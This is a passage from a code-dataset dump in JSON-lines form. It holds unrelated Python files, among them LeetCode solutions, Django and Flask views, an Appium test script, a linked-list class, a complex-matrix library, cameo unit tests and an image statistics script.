anarci_heavy[category].astype('category')\n\ncols = [\"Id\"]+list(anarci_light.columns)[-127:]\nanarci_light = anarci_light.loc[:, cols]\nfor category in cols[1:]:\n    anarci_light[category] = anarci_light[category].astype('category')\n\n# numpy has no merge(); joining the paired data with the anarci table on the\n# shared ids ('index' vs. anarci 'Id') is the apparent intent of this line\ndata_filter = pd.merge(data, anarci_heavy, left_on='index', right_on='Id')","sub_path":"src/pre_processing.py","file_name":"pre_processing.py","file_ext":"py","file_size_in_byte":2051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"169632715","text":"class Solution:\n    def fullJustify(self, words: List[str], max_width: int) -> List[str]:\n        # let M be number of words and K be max_width\n        # Time: O(MK); Space: O(K)\n        # if K << M, time: O(M); space: O(1)\n        # \n        lines = []\n        start, end = 0, 1\n        \n        # O(M)\n        while True:\n            # Construct a line\n            count = len(words[start])\n            while count < max_width and end < len(words):\n                count += (1 + len(words[end]))\n                end += 1\n            \n            if count > max_width:\n                end -= 1\n                count -= (1 + len(words[end]))\n            \n            extra_spaces = max_width - count\n            \n            # Last line\n            if end == len(words):\n                lines.append(' '.join(words[start: end]) + ' ' * extra_spaces)\n                break\n            \n            # Last - 1 line\n            n_spaces = end - start - 1\n            left, add_spaces = (extra_spaces % n_spaces, \n                                extra_spaces // n_spaces) if n_spaces else (0, extra_spaces)\n            tmp = words[start]\n            # Edge case, if we can only fit one word in a line\n            if not n_spaces:\n                tmp += ' ' * add_spaces\n            for i in range(start + 1, end):\n                if left:\n                    tmp += ' ' * (1 + add_spaces + 1) + words[i]\n                    left -= 1\n                else:\n                    tmp += ' ' * (1 + add_spaces) + words[i]\n            lines.append(tmp)\n            \n            start, end = end, end + 1\n        return lines\n    ","sub_path":"leetcode/lc68_Text_Justification.py","file_name":"lc68_Text_Justification.py","file_ext":"py","file_size_in_byte":1629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"18313032","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.shortcuts import render_to_response\nfrom books.models import Book\n\n# We don't need this 
anymore\ndef search_form(request):\n return render_to_response('search_form.html')\n\ndef search(request):\n errors = []\n if 'q' in request.GET:\n q = request.GET['q']\n if not q:\n errors.append('Please enter a search term')\n elif len(q) > 20:\n errors.append('The search term should be less than 20 characters')\n else:\n books = Book.objects.filter(title__icontains = q)\n return render_to_response('search_results.html', {'books': books, 'query': q})\n \n return render_to_response('search_form.html', {'errors': errors})","sub_path":"mysite/books/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"575844969","text":"from TeobaldoGames import app\nfrom flask import render_template, flash, redirect\nfrom .forms import LoginForm\n\n@app.route('/')\n@app.route('/home')\ndef home():\n return render_template('home.html', title='Home - TeobaldoGames')\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n\tform = LoginForm()\n\tif form.validate_on_submit():\n\t\tflash('Login sucessu.')\n\t\treturn redirect('/home')\n\treturn render_template('login.html', \n\t\t\t\t\t\t\ttitle='Sign In',\n\t\t\t\t\t\t\tform = form)","sub_path":"TeobaldoGames/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"109628880","text":"def char_range(char_a, char_b):\n start = ord(char_a)\n end = ord(char_b)\n\n for i in range(start + 1, end):\n if i != end-1:\n print(chr(i), end=\" \")\n else:\n print(chr(i))\n\n\nletter_one = input()\nletter_two = input()\nchar_range(letter_one, letter_two)\n","sub_path":"03. Functions/03. Characters in Range.py","file_name":"03. 
Characters in Range.py","file_ext":"py","file_size_in_byte":292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"252697531","text":"# -*- coding:utf8 -*-\n\nimport time\nfrom appium import webdriver\n\ndesired_caps = {}\ndesired_caps['platformName'] = 'Android'\ndesired_caps['platformVersion'] = '7.0'\ndesired_caps['deviceName'] = 'emulator-5554'\ndesired_caps['appPackage'] = 'com.google.android.youtube'\ndesired_caps['appActivity'] = '.app.honeycomb.Shell$HomeActivity'\ndesired_caps['newCommandTimeout'] = '1000'\ndesired_caps['noReset'] = True\n\n\ndriver = webdriver.Remote('http://0.0.0.0:4723/wd/hub', desired_caps)\ntime.sleep(10)\n\n# home page\nel = driver.find_element_by_accessibility_id(\"Impossible Challenge S2 20161218 Basketball Shooting & Brain Wave Control | CCTV - 1 hour, 37 minutes - Go to channel - CCTV中国中央电视台 - 1.5M views - 4 years ago - play video\")\nel.click()\n\ndriver.quit()\n\n\n'''\n{\n \"platformName\": \"Android\",\n \"platformVersion\": \"10\",\n \"deviceName\": \"emulator-5554\",\n \"noReset\": true,\n \"appPackage\": \"com.google.android.youtube\",\n \"appActivity\": \".app.honeycomb.Shell$HomeActivity\"\n}\n'''","sub_path":"ApkTestScript/youtube.py","file_name":"youtube.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"10648903","text":"''' Singly Linked List\nAccess - Θ(n), O(n)\nSearch - Θ(n), O(n)\nInsertion - Θ(1), O(1)\nDeletion - Θ(1), O(1)\n'''\nclass SinglyLinkedList:\n def __init__(self, head_data = None):\n self.head = self.SLLNode(head_data) if head_data is not None else None\n\n def access(self, position):\n curr = self.head\n i = 0\n while curr and i < position:\n curr = curr.next\n i += 1\n if curr:\n return curr\n else:\n raise IndexError('SLL index out of bounds.')\n\n def search(self, value):\n curr, i = self.head, 0\n while curr:\n if curr.data == value:\n return i\n curr, i = curr.next, i + 1\n return -1 # does not exist\n\n def insert(self, value, position=-1):\n position = self.__len__() if position == -1 else position\n if position > self.__len__() or position < 0:\n raise IndexError('Position index out of bounds.')\n to_insert = self.SLLNode(value)\n\n if position == 0:\n to_insert.next = self.head\n self.head = to_insert\n else:\n prevNode = self.access(position-1)\n nextNode = prevNode.next\n prevNode.next = to_insert\n to_insert.next = nextNode\n\n def delete(self, position):\n if position >= self.__len__() or position < 0:\n raise IndexError('Position index out of bounds.')\n \n if position == 0:\n if self.head:\n self.head = self.head.next\n else:\n prevNode = self.access(position-1)\n nextNode = prevNode.next.next\n prevNode.next = nextNode\n\n def to_list(self):\n output = []\n curr = self.head\n while curr:\n output.append(curr.data)\n curr = curr.next\n return output\n\n def __getitem__(self, key):\n sz = self.__len__()\n if key < 0:\n key = sz + key\n if key > sz or key < 0:\n raise IndexError('List index out of range.')\n return self.access(key).data\n\n def __repr__(self):\n return str(self.to_list())\n\n def __len__(self):\n return len(self.to_list())\n\n class SLLNode:\n def __init__(self, data):\n self.data = data\n self.next = None","sub_path":"InterviewPrep/datastructures/SinglyLinkedList.py","file_name":"SinglyLinkedList.py","file_ext":"py","file_size_in_byte":2320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} 
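Note on the SinglyLinkedList record above: its docstring advertises Θ(1) insertion and deletion, but insert() and delete() locate the target position via access() (and __len__ walks the whole list), so both are O(n) except at the head. A minimal usage sketch, assuming the SinglyLinkedList class from that record is in scope:

 sll = SinglyLinkedList(1)   # head -> [1]
 sll.insert(2)               # append -> [1, 2]
 sll.insert(0, position=0)   # prepend -> [0, 1, 2]
 assert sll.search(2) == 2   # value 2 sits at index 2
 sll.delete(1)               # remove position 1 -> [0, 2]
 print(sll)                  # [0, 2]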
+{"seq_id":"634659090","text":"import math\n\n\ndef suma(num1, num2):\n suma1 =num1[0] + num2[0]\n suma2 =num1[1] + num2[1]\n resultado = suma1, suma2\n return resultado\n\n\ndef resta(num1, num2):\n resta1 = round(num1[0] - num2[0], 3)\n resta2 = round(num1[1] - num2[1], 3)\n resultado = resta1, resta2\n return resultado\n\n\ndef multi(num1, num2):\n rest1 = (num1[0] * num2[0]) - (num1[1] * num2[1])\n rest2 = (num1[0] * num2[1]) + (num1[1] * num2[0])\n resultado = rest1, rest2\n return resultado\n\n\ndef division(num1, num2):\n div1 = round(((num1[0] * num2[0]) + (num1[1] * num2[1])) / ((num2[0] ** 2) + (num2[1] ** 2)), 3)\n div2 = round(((num1[1] * num2[0]) - (num1[0] * num2[1])) / ((num2[0] ** 2) + (num2[1] ** 2)), 3)\n resultado = div1, div2\n return resultado\n\n\ndef modulo(num1):\n rta = round(((num1[0] ** 2) + (num1[1] ** 2)) ** (1 / 2), 2)\n return rta\n\n\ndef conjugado(num1):\n img = num1[1] * -1\n rta = num1[0], img\n return rta\n\n\ndef polares(num1):\n p = modulo(num1)\n theta = round(math.atan2(num1[1] , num1[0]), 3)\n resultado = p, theta\n return resultado\n\n\ndef cartesianos(num1):\n a = round(num1[0] * (math.cos(num1[1])), 3)\n b = round(num1[0] * (math.sin(num1[1])), 3)\n resultado = a, b\n return resultado\n\n\ndef fase(num1):\n fase1 = round(math.atan2(num1[1], num1[0]), 3)\n return fase1\n\n\ndef suma_vecto(vect1, vect2):\n resultado = []\n if len(vect1) != len(vect1):\n print(\"Error: diferent lenght vectors\")\n for i in range(len(vect1)):\n suma_real = suma(vect1[i], vect2[i])\n resultado += [suma_real]\n return resultado\n\n\ndef inverse(num):\n num2 = num[0] * -1, num[1] * -1\n return num2\n\n\ndef inverse_vecto(vect):\n for i in range(len(vect)):\n vect[i] = inverse(vect[i])\n return vect\n\n\ndef multi_esc(num, vect):\n resultado = []\n for i in range(len(vect)):\n multi_vect = multi(num, vect[i])\n resultado += [multi_vect]\n return resultado\n\n\ndef suma_mat(mat1, mat2):\n resultado = []\n for i in range(len(mat1)):\n suma = suma_vecto(mat1[i], mat2[i])\n resultado += [suma]\n return resultado\n\n\ndef inverse_mat(mat):\n for i in range(len(mat)):\n for j in range(len(mat[0])):\n mat[i][j] = inverse(mat[i][j])\n return mat\n\n\ndef multi_esc_mat(num, mat):\n resultado = []\n for i in range(len(mat)):\n mult = multi_esc(num, mat[i])\n resultado += [mult]\n return resultado\n\n\ndef traspuesta(vect):\n n = len(vect) # filas\n m = len(vect[0]) # columnas\n matriz = [[0 for i in range(n)] for j in range(m)]\n for i in range(n):\n for j in range(m):\n matriz[j][i] = vect[i][j]\n return matriz\n\n\ndef conjugada_mat(mat):\n for i in range(len(mat)):\n for j in range(len(mat[0])):\n mat[i][j] = conjugado(mat[i][j])\n return mat\n\n\ndef adjunta(mat):\n mat2 = [[mat[i][j] for j in range(len(mat[0]))] for i in range(len(mat))]\n mat2 = conjugada_mat(mat2)\n mat2 = traspuesta(mat2)\n return mat2\n\n\ndef producto(mat1, mat2):\n if len(mat1[0]) != len(mat2):\n return \"Is not possible\"\n else:\n matriz = [[(0, 0) for i in range(len(mat2[0]))] for j in range(len(mat1))]\n for i in range(len(mat1)):\n for j in range(len(mat2[0])):\n for k in range(len(mat1[0])):\n matriz[i][j] = suma(matriz[i][j], multi(mat1[i][k], mat2[k][j]))\n return matriz\n\n\ndef Accion(mat, vect):\n rta = producto(mat, vect)\n return rta\n\n\ndef product_int(vect1, vect2):\n if isinstance(vect1[0], tuple) or isinstance(vect2[0], tuple):\n rta = (0, 0)\n if len(vect1) == len(vect2):\n for i in range(len(vect1)):\n rta = suma(rta, (multi(vect1[i], vect2[i])))\n return rta\n else:\n vect = 
adjunta(vect1)\n rta = producto(vect, vect2)\n return rta[0][0]\n\n\ndef norma(vect):\n suma = 0\n for i in range(len(vect)):\n suma += (modulo(vect[i]) ** 2)\n return round(suma ** (1 / 2), 2)\n\n\ndef distancia(vect1, vect2):\n resultado = []\n if len(vect1) != len(vect1):\n print(\"Error: diferent lenght vectors\")\n else:\n for i in range(len(vect1)):\n resta_vect = resta(vect1[i], vect2[i])\n resultado += [resta_vect]\n return abs(norma(resultado))\n\n\ndef unit(mat):\n if len(mat) == len(mat[0]):\n In = [[(0, 0) for j in range(len(mat[0]))] for i in range(len(mat))]\n for i in range(len(mat)):\n for j in range(len(mat[0])):\n if i == j:\n In[i][j] = (1, 0)\n mat1 = adjunta(mat)\n product = producto(mat1, mat)\n rta = True\n for i in range(len(mat)):\n for j in range(len(mat)):\n if product[i][j] != In[i][j]:\n rta = False\n if rta:\n return True\n else:\n return False\n else:\n return \"The input have to be a square matrix\"\n\n\ndef herm(mat):\n aux = mat[:]\n mat2 = adjunta(aux)\n rta = True\n for i in range(len(mat)):\n for j in range(len(mat[0])):\n if mat[i][j] == mat2[i][j] and mat[i][j] == mat2[i][j]:\n continue\n else:\n rta = False\n return rta\n\n\ndef tensor(mat1, mat2):\n for i in range(len(mat1)):\n for j in range(len(mat2)):\n h = mat1[i][j]\n mat1[i][j] = multi_esc_mat(h, mat2)\n return mat1\n\n\ndef printmatrix(matrix):\n for row in range(len(matrix)):\n print(''.join(map(str, matrix[row])))\n\ndef matriz(mat,vect,clicks):\n for j in range(clicks):\n new_vect=producto(mat,vect)\n vect=new_vect\n return vect\n\nprint(matriz([[(0,0),(0,0),(1/18,0),(2/18,0),(5/18,0),(10/18,0)],[(0,0),(0,0),(2/18,0),(1/18,0),(10/18,0),(5/18,0)],[(1/9,0),(2/9,0),(1/6,0),(2/6,0),(1/18,0),(2/18,0)],[(2/9,0),(1/9,0),(2/6,0),(1/6,0),(2/18,0),(1/18,0)],[(2/9,0),(4/9,0),(1/9,0),(2/9,0),(0,0),(0,0)],[(4/9,0),(2/9,0),(2/9,0),(1/9,0),(0,0),(0,0)]],[[(0.001, 0)], [(0.045, 0)], [(0.004, 0)], [(0.009, 0)], [(0.855, 0)], [(0.085, 0)]],2))\n#c_2(15,8)","sub_path":"ComplexNumbers/new_complejos.py","file_name":"new_complejos.py","file_ext":"py","file_size_in_byte":6089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"16407895","text":"#!/usr/bin/env python2\n#reducer.py\nimport sys\n\nSUM_WRITERS = 0\nNUM_TITLES = 0\n\nfor line in sys.stdin:\n titles, writers = line.strip().split(\"\\t\")\n SUM_WRITERS += int(writers)\n NUM_TITLES += int(titles)\nresult = SUM_WRITERS/float(NUM_TITLES)\nresult = int(round(result))\nprint(str(result))\n","sub_path":"task7/reducer.py","file_name":"reducer.py","file_ext":"py","file_size_in_byte":297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"335489855","text":"# Copyright 2014 Novo Nordisk Foundation Center for Biosustainability, DTU.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom __future__ import absolute_import, print_function\n\nimport os\nimport unittest\nfrom functools import partial\nfrom itertools import chain\n\nfrom cobra import 
Metabolite\nfrom six.moves import range\n\nfrom cameo.io import load_model\nfrom cameo.flux_analysis.simulation import lmoma\nfrom cameo.network_analysis.util import distance_based_on_molecular_formula\nfrom cameo.util import TimeMachine, generate_colors, Singleton, partition, RandomGenerator, frozendict, ProblemCache\n\n\nTESTDIR = os.path.dirname(__file__)\nTESTMODEL = load_model(os.path.join(TESTDIR, 'data/EcoliCore.xml'), sanitize=False)\n\n\nclass TimeMachineTestCase(unittest.TestCase):\n def setUp(self):\n self.tm = TimeMachine()\n\n def test_one_change_list(self):\n l = [1, 2, 3, 4]\n self.tm(do=partial(l.append, 5), undo=l.pop)\n self.assertEqual(l, [1, 2, 3, 4, 5])\n self.tm.reset()\n self.assertEqual(l, [1, 2, 3, 4])\n\n def test_str_handles_different_types_of_stored_operations(self):\n def normal_function():\n pass\n\n partial_function = partial(str, 1)\n self.tm(do=normal_function, undo=partial_function)\n self.assertEqual(self.tm.__str__().split('\\n')[2:-1],\n [\"undo: \" + str(str) + \" (1,) {}\", 'redo: normal_function'])\n\n def test_with_statement(self):\n l = [1, 2, 3, 4]\n with TimeMachine() as tm:\n tm(do=partial(l.append, 33), undo=partial(l.pop))\n tm(do=partial(l.append, 66), undo=partial(l.pop))\n tm(do=partial(l.append, 99), undo=partial(l.pop))\n self.assertEqual(l, [1, 2, 3, 4])\n\n\ndef some_method_that_adds_stuff(model, cache):\n assert isinstance(cache, ProblemCache)\n\n def create_variable(model, var_id, lb, ub):\n return model.solver.interface.Variable(var_id, ub=ub, lb=lb)\n\n def update_variable(model, var, lb, ub):\n var.lb = lb\n var.ub = ub\n\n def create_constraint(model, cid, vars, lb, ub):\n return model.solver.interface.Constraint(vars[0] + vars[1], ub=ub, lb=lb)\n\n def update_constraint(model, constraint, vars, lb, ub):\n constraint.lb = lb\n constraint.ub = ub\n\n for i in range(10):\n cache.add_variable(\"var_%i\" % (i+1), create_variable, update_variable, 10, 15)\n\n for i in range(9):\n v1 = cache.variables[\"var_%i\" % (i+1)]\n v2 = cache.variables[\"var_%i\" % (i+2)]\n cache.add_constraint(\"c_%i\" % (i+1), create_constraint, update_constraint, [v1, v2], -20, 100)\n\n\nclass TestProblemCache(unittest.TestCase):\n def setUp(self):\n self.reference = TESTMODEL.solve().fluxes\n self.n_constraints = len(TESTMODEL.solver.constraints)\n self.n_variables = len(TESTMODEL.solver.variables)\n\n def test_add_variable(self):\n cache = ProblemCache(TESTMODEL)\n add_var = lambda model, var_id: model.solver.interface.Variable(var_id, ub=0)\n update_var = lambda model, var: setattr(var, \"ub\", 1000)\n for i in range(10):\n cache.add_variable(\"%i\" % i, add_var, update_var)\n\n for i in range(10):\n self.assertIn(cache.variables[\"%i\" % i], TESTMODEL.solver.variables)\n self.assertEqual(cache.variables[\"%i\" % i].ub, 0)\n self.assertEqual(TESTMODEL.solver.variables[\"%i\" % i].ub, 0)\n\n for i in range(10):\n cache.add_variable(\"%i\" % i, add_var, update_var)\n self.assertEqual(cache.variables[\"%i\" % i].ub, 1000)\n self.assertEqual(TESTMODEL.solver.variables[\"%i\" % i].ub, 1000)\n\n cache.reset()\n\n for i in range(10):\n self.assertRaises(KeyError, TESTMODEL.solver.variables.__getitem__, \"%i\" % i)\n\n def test_add_constraint(self):\n cache = ProblemCache(TESTMODEL)\n\n add_var = lambda model, var_id: model.solver.interface.Variable(var_id, ub=0)\n add_constraint = lambda m, const_id, var: m.solver.interface.Constraint(var, lb=-10, ub=10, name=const_id)\n update_constraint = lambda model, const, var: setattr(const, \"ub\", 1000)\n\n for i in 
range(10):\n cache.add_variable(\"%i\" % i, add_var, None)\n cache.add_constraint(\"c%i\" % i, add_constraint, update_constraint, cache.variables[\"%i\" % i])\n\n for i in range(10):\n self.assertIn(cache.constraints[\"c%i\" % i], TESTMODEL.solver.constraints)\n self.assertEqual(cache.constraints[\"c%i\" % i].ub, 10)\n self.assertEqual(cache.constraints[\"c%i\" % i].lb, -10)\n self.assertEqual(TESTMODEL.solver.constraints[\"c%i\" % i].ub, 10)\n self.assertEqual(TESTMODEL.solver.constraints[\"c%i\" % i].lb, -10)\n\n for i in range(10):\n cache.add_constraint(\"c%i\" % i, add_constraint, update_constraint, cache.variables[\"%i\" % i])\n self.assertEqual(TESTMODEL.solver.constraints[\"c%i\" % i].ub, 1000)\n\n cache.reset()\n\n for i in range(10):\n self.assertRaises(KeyError, TESTMODEL.solver.variables.__getitem__, \"%i\" % i)\n self.assertRaises(KeyError, TESTMODEL.solver.constraints.__getitem__, \"c%i\" % i)\n\n def test_cache_problem(self):\n # After the number of variables and constraints remains the same if nothing happens\n self.assertEqual(self.n_constraints, len(TESTMODEL.solver.constraints))\n self.assertEqual(self.n_variables, len(TESTMODEL.solver.variables))\n\n cache = ProblemCache(TESTMODEL)\n some_method_that_adds_stuff(TESTMODEL, cache)\n # After running some_method_that_adds_stuff with cache, problem has 10 more variables\n self.assertEqual(self.n_variables+10, len(TESTMODEL.solver.variables))\n # And has 9 more more constraints\n self.assertEqual(self.n_constraints+9, len(TESTMODEL.solver.constraints))\n\n cache.reset()\n # After reset cache, the problem should return to its original size\n self.assertEqual(self.n_constraints, len(TESTMODEL.solver.constraints))\n self.assertEqual(self.n_variables, len(TESTMODEL.solver.variables))\n\n def test_with(self):\n with ProblemCache(TESTMODEL) as cache:\n some_method_that_adds_stuff(TESTMODEL, cache)\n # After running some_method_that_adds_stuff with cache, problem has 10 more variables\n self.assertEqual(self.n_variables+10, len(TESTMODEL.solver.variables))\n # And has 9 more more constraints\n self.assertEqual(self.n_constraints+9, len(TESTMODEL.solver.constraints))\n\n # If the method runs again, it does not add repeated variables\n some_method_that_adds_stuff(TESTMODEL, cache)\n # After running some_method_that_adds_stuff with cache, problem has 10 more variables\n self.assertEqual(self.n_variables+10, len(TESTMODEL.solver.variables))\n # And has 9 more more constraints\n self.assertEqual(self.n_constraints+9, len(TESTMODEL.solver.constraints))\n\n # After reset cache, the problem should return to its original size\n self.assertEqual(self.n_constraints, len(TESTMODEL.solver.constraints))\n self.assertEqual(self.n_variables, len(TESTMODEL.solver.variables))\n\n\nclass TestRandomGenerator(unittest.TestCase):\n def setUp(self):\n self.seed = 1234\n\n def test_random(self):\n random = RandomGenerator()\n for _ in range(1000):\n self.assertGreaterEqual(random.random(), 0)\n self.assertLessEqual(random.random(), 1)\n\n def test_randint(self):\n random = RandomGenerator()\n lower = 0\n upper = 10\n for _ in range(10000):\n self.assertGreaterEqual(random.randint(lower, upper), lower)\n self.assertLessEqual(random.randint(lower, upper), upper)\n\n lower = -10\n upper = 100\n for _ in range(10000):\n self.assertGreaterEqual(random.randint(lower, upper), lower)\n self.assertLessEqual(random.randint(lower, upper), upper)\n\n lower = 5\n upper = 21\n for _ in range(10000):\n self.assertGreaterEqual(random.randint(lower, upper), lower)\n 
self.assertLessEqual(random.randint(lower, upper), upper)\n\n lower = -5\n upper = 5\n for _ in range(10000):\n self.assertGreaterEqual(random.randint(lower, upper), lower)\n self.assertLessEqual(random.randint(lower, upper), upper)\n\n def test_seeded_methods(self):\n random = RandomGenerator()\n\n random.seed(self.seed)\n value = random.random()\n random.seed(self.seed)\n self.assertEqual(value, random.random())\n\n random.seed(self.seed)\n value = random.randint(1, 10)\n random.seed(self.seed)\n self.assertEqual(value, random.randint(1, 10))\n\n random.seed(self.seed)\n population = [1, 2, 3, 4, 5]\n value = random.sample(population, 2)\n random.seed(self.seed)\n self.assertEqual(value, random.sample(population, 2))\n\n random.seed(self.seed)\n value = random.uniform()\n random.seed(self.seed)\n self.assertEqual(value, random.uniform())\n\n\nclass TestUtils(unittest.TestCase):\n def test_color_generation(self):\n for i in range(1, 100):\n color_map = generate_colors(i)\n self.assertEqual(len(color_map), i)\n self.assertEqual(len(color_map), len(set(color_map.values())))\n\n def test_partition(self):\n chunks = 3\n iterables = [\n [1, 2, 3, 4, 5, 6, 7, 8, 9],\n {5, 3, 8, 3, 8, 5, 8, 0, 10, 11, 15},\n range(29)\n ]\n for fixture in iterables:\n test_output = partition(fixture, chunks)\n self.assertEqual(len(fixture), sum(map(len, test_output)))\n self.assertEqual(len(test_output), chunks)\n self.assertEqual(list(fixture), list(chain(*test_output)))\n for out_chunk in test_output:\n self.assertTrue(set(out_chunk).issubset(set(fixture)))\n\n bad_input = 5\n self.assertRaises(TypeError, partition, bad_input, chunks)\n\n def test_distance_based_on_molecular_formula(self): # from network_analysis.util\n met1 = Metabolite(\"H2O\", formula=\"H2O\")\n met2 = Metabolite(\"H2O2\", formula=\"H2O2\")\n met3 = Metabolite(\"C6H12O6\", formula=\"C6H12O6\")\n\n self.assertEqual(distance_based_on_molecular_formula(met1, met2, normalize=False), 1)\n self.assertEqual(distance_based_on_molecular_formula(met1, met2, normalize=True), 1. / 7)\n\n self.assertEqual(distance_based_on_molecular_formula(met2, met3, normalize=False), 20)\n self.assertEqual(distance_based_on_molecular_formula(met2, met3, normalize=True), 20. / 28)\n\n self.assertEqual(distance_based_on_molecular_formula(met1, met3, normalize=False), 21)\n self.assertEqual(distance_based_on_molecular_formula(met1, met3, normalize=True), 21. 
/ 27)\n\n\nclass FrozendictTestCase(unittest.TestCase):\n def setUp(self):\n self.frozen_dict = frozendict({\"A\": 1, \"B\": 2, \"C\": 3, \"D\": 4, \"E\": [2, 3, 4, 5]})\n\n def test_frozen_attributes(self):\n self.assertRaises(AttributeError, self.frozen_dict.popitem)\n self.assertRaises(AttributeError, self.frozen_dict.pop, \"A\")\n self.assertRaises(AttributeError, self.frozen_dict.__setitem__, \"C\", 1)\n self.assertRaises(AttributeError, self.frozen_dict.setdefault, \"K\")\n self.assertRaises(AttributeError, self.frozen_dict.__delitem__, \"A\")\n self.assertRaises(AttributeError, self.frozen_dict.update)\n\n self.assertTrue(hasattr(self.frozen_dict, \"__hash__\"))\n\n\nclass TestSingleton(unittest.TestCase):\n def test_singleton(self):\n s1 = Singleton()\n s2 = Singleton()\n self.assertIs(s1, s2)\n\n\nif __name__ == \"__main__\":\n import nose\n\n nose.runmodule()\n","sub_path":"tests/test_util.py","file_name":"test_util.py","file_ext":"py","file_size_in_byte":12378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"371659361","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Nov 15 16:48:49 2016\n\n@author: medialab\n\"\"\"\nimport pygame\n\ndef typetext(frame_surface,string,pos,color = (255,255,0),fontsize=60,bold=False):\n myfont = pygame.font.SysFont(\"Arial\", fontsize,bold)\n label = myfont.render(string, 1, color)\n frame_surface.blit(label, pos)","sub_path":"Data_Conversion/Kfunc/IO/typetext.py","file_name":"typetext.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"201631175","text":"\"\"\"\nin this script, we calculate the image per channel mean and standard\ndeviation in the training set, do not calculate the statistics on the\nwhole dataset, as per here http://cs231n.github.io/neural-networks-2/#datapre\nBased on: https://gist.github.com/jdhao/9a86d4b9e4f79c5330d54de991461fd6\n\ne.g.python extract_mean_std.py ~/coral_andreas/coral-video-identification/pytorch_segmentation/data/Coral/train/images ~/coral_andreas/coral-video-identification/pytorch_segmentation/data/Coral/mean_std_coral.json\n\"\"\"\n\nimport sys\nimport numpy as np\nfrom os import listdir\nfrom os.path import join, isdir\nfrom glob import glob\nimport cv2\nimport json\n\n# number of channels of the dataset image, 3 for color jpg, 1 for grayscale img\n# you need to change it to reflect your dataset\nCHANNEL_NUM = 3\n\n\ndef cal_dir_stat(root):\n pixel_num = 0 # store all pixel number in the dataset\n channel_sum = np.zeros(CHANNEL_NUM)\n channel_sum_squared = np.zeros(CHANNEL_NUM)\n\n im_pths = glob(join(root, \"*.png\"))\n print(\"Extracting mean and std\")\n for path in im_pths:\n im = cv2.imread(path) # image in M*N*CHANNEL_NUM shape, channel in BGR order\n im = im/255.0\n pixel_num += (im.size/CHANNEL_NUM)\n channel_sum += np.sum(im, axis=(0, 1))\n channel_sum_squared += np.sum(np.square(im), axis=(0, 1))\n bgr_mean = channel_sum / pixel_num\n bgr_std = np.sqrt(channel_sum_squared / pixel_num - np.square(bgr_mean))\n \n # change the format from bgr to rgb\n rgb_mean = list(bgr_mean)[::-1]\n rgb_std = list(bgr_std)[::-1]\n \n return rgb_mean, rgb_std\n\n# The script assumes that under train_root, there are separate directories for each class\n# of training images.\ntrain_root = sys.argv[1] \nfile_name = sys.argv[2]\nmean, std = cal_dir_stat(train_root)\nmean_std_data = {\"mean\": mean, \"std\": std}\nwith open(file_name, 'w') as f:\n 
json.dump(mean_std_data, f)\n","sub_path":"dataloaders/extract_mean_std.py","file_name":"extract_mean_std.py","file_ext":"py","file_size_in_byte":1899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"357223849","text":"from PLC.Method import Method\nfrom PLC.Parameter import Parameter, Mixed\nfrom PLC.Filter import Filter\nfrom PLC.Auth import Auth\nfrom PLC.Slices import Slice, Slices\nfrom PLC.Persons import Person, Persons\nfrom PLC.Methods.GetSlices import GetSlices\nfrom PLC.Methods.GetPersons import GetPersons\n\nclass SliceListUserSlices(GetSlices, GetPersons):\n \"\"\"\n Deprecated. Can be implemented with GetPersons and GetSlices.\n\n Return the slices the specified user (by email address) is a member of.\n\n Users may only query slices of which they are members. PIs may\n query any of the slices at their sites. Admins may query any\n slice. If a slice that cannot be queried is specified in\n slice_filter, details about that slice will not be returned.\n \"\"\"\n\n status = \"deprecated\"\n\n roles = ['admin', 'pi', 'user']\n\n accepts = [\n Auth(),\n Person.fields['email']\n ]\n\n returns = [Slice.fields['name']]\n\n\n def call(self, auth, email):\n\n persons = GetPersons.call(self, auth, [email])\n if not persons:\n return []\n person = persons[0]\n slice_ids = person['slice_ids']\n if not slice_ids:\n return []\n\n slices = GetSlices.call(self, auth, slice_ids)\n slice_names = [slice['name'] for slice in slices]\n\n return slice_names\n","sub_path":"PLC/Methods/SliceListUserSlices.py","file_name":"SliceListUserSlices.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"381345886","text":"\"\"\"Given a string s consisting of small English letters, find and return the first\ninstance of a non-repeating character in it. If there is no such character, return '_'.\n\nasked by - Amazon\n\nExample:\nFor s = \"abacabad\", the output should be firstNotRepeatingCharacter(s) = 'c'.\nThere are 2 non-repeating characters in the string: 'c' and 'd'. Return c since it appears in the string first.\n\nFor s = \"abacabaabacaba\", the output should be\nfirstNotRepeatingCharacter(s) = '_'.\nThere are no characters in this string that do not repeat. 
